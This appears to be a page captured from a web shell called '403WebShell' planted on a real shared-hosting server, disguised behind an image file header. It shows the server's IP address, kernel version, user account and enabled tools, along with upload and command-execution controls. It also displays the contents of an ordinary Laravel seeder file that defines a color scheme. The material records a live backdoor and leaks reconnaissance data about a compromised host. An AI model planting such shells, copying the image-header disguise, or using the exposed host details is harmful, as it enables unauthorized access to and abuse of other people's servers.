����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 18.191.132.105
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/gle.gltechlimited.com/database/seeders/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/gle.gltechlimited.com/database/seeders/ColorSchemesTableSeeder.php
<?php

namespace Database\Seeders;

use Illuminate\Database\Seeder;

class ColorSchemesTableSeeder extends Seeder
{

    /**
     * Auto generated seed file
     *
     * @return void
     */
    public function run()
    {
        

        \DB::table('color_schemes')->delete();
        
        \DB::table('color_schemes')->insert(array (
            0 => 
            array (
                'id' => 1,
                'color_scheme' => 'dark',
                'default_navigation_color' => '#111111FA',
                'custom_navigation_color' => NULL,
                'default_text_color' => '#48A3C6',
                'custom_text_color' => NULL,
                'default_text_on_color' => '#90DFFE',
                'custom_text_on_color' => NULL,
                'default_back_to_top_color' => '#111',
                'custom_back_to_top_color' => NULL,
                'default_back_to_top_bgcolor' => '#FFF',
                'custom_back_to_top_bgcolor' => NULL,
                'default_back_to_top_bgcolor_on_hover' => '#48A3C6',
                'custom_back_to_top_bgcolor_on_hover' => NULL,
                'default_back_to_top_color_on_hover' => '#FFF',
                'custom_back_to_top_color_on_hover' => NULL,
                'default_footer_background_color' => '#111',
                'custom_footer_background_color' => NULL,
                'created_at' => now(),
                'updated_at' => now(),
            ),
        ));
        
        
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit